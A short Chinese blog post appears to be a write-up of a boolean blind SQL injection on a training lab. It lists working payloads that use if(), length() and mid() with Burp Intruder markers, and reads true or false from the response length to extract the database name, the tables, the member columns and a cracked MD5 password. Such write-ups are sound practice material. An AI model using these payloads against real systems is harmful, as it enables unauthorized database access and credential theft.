postweb注入
bool盲注复现
###思路:
####1.得到数据库的名称
爆破数据库名称长度:
1 | 1/if(length(database())!=1,1,0) |
响应:
1 | Content-Length: 1059 |
如果代码有误,则不会是1059长度
设置变量:
1 | 1/if(length(database())=§1§,1,0) |
可知长度为10
- 爆破数据库名称:
1 | 1/if(mid(database(),2,1)!='r',1,0) |
响应:
1 | Content-Length: 1059 |
放入intruder设置变量:
1 | 1/if(mid(database(),§2§,1)='§r§',1,0) |
可知 库为:stormgroup
####2.已知库求表的长度和表的名称:
1 | 1/if(length((select group_concat(table_name) from information_schema.tables where table_schema='stormgroup'))!=56,1,0) |
响应:
1 | Content-Length: 1059 |
同理:
tablename长度为13,接下来爆破名称:
可知名称为member,notice
####3.由名称可得爆破member 列
1 | 1/if(length((select group_concat(column_name) from information_schema.columns where table_name='member'))!=56,1,0) |
响应:
1 | Content-Length: 1059 |
同理:
可知长度为column为20
由长度爆破列名:
1 | 1/if(mid((select group_concat(column_name) from information_schema.columns where table_name='member'),2,1)!='r',1,0) |
列名:name,password,status
求name长度
求name名称
mozhe,mozhe
求password的长度
password长度65
求password
MD5解密:
927622
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 LX3820!